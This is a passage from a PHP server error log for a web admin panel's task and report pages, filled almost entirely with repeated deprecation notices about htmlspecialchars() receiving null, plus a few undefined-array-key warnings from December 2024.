/home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:09:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 10:14:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Dec-2024 10:15:00 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Dec-2024 10:15:00 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Dec-2024 10:15:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Dec-2024 10:15:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [10-Dec-2024 10:15:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [10-Dec-2024 10:16:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [10-Dec-2024 10:16:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [10-Dec-2024 10:16:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Dec-2024 10:16:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Dec-2024 10:18:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Dec-2024 21:35:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is 